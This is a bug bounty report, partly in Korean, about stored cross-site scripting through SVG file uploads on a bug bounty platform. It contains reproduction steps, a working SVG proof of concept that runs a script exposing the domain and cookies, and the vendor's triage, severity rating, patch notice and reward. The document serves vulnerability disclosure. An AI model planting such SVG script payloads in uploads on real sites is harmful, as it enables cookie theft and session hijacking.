취약점 유형
상세내용
summary
xss with svg upload
Reproduction process
[Please describe the process to reproduce the vulnerability]
- make a new report
- in attachment sectan add svg file with javascript pyload
- upload and go to the file link you will get the alert
Possible cause of vulnerability
xss
How to patch
you must sanitize your input. Your application code should never output data received as input directly to the browser without checking it for malicious code.
For more details, refer to the following articles: Preventing XSS Attacks and How to Prevent DOM-based Cross-site Scripting. You can also find useful information in the XSS Prevention Cheat Sheet maintained by the OWASP organization.
Expected results and impact
xss
Other notes and references
https://hackerone.com/reports/894876
https://hackerone.com/reports/148853
https://hackerone.com/reports/647130
첨부파일
타임라인
hi team
that is the poc code of svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS by Spade\n'+document.domain+'\n'+document.cookie);
</script>
</svg>
i made nthore report just to make a POC for that
the report id is : https://bugcamp.io/tickets/4e615aa96f853f7aafa08c0fc59a1482
Hello M0X0101.
The ticket has accepted.
The vulnerabiltiy has caused by developer’s mistake that is omitted validation routine.
Patch in progress.
We decided severity of this report as “LOW”. Because, the XSS payload is triggered at “static.bugcamp.io” that is out of boundary of bounty program policy, and it used for only static file serving.
We considered for how the vulnerabilty is misusage, variously. But there was no affective scenario.
If you have provable impactive scenario (like account takeover, etc) Please let us know. than, we’ll re-evaluate this ticket.
Thank you.
Thanks
But there was some problem on payment method as I’m Egyptian.
And the support team tall me they you can send it to my bank if the total bounty is greater than 50000
Okay, we also considering for payment method for foreigner.
Please email to “support@bugcamp.io”.
we can discuss about it.
Hi M0X0101.
The Patch has deployed.
Please make sure that the vulnerability has been patched properly.
Reward is ₩30,000
Please submit it along with the PoC code.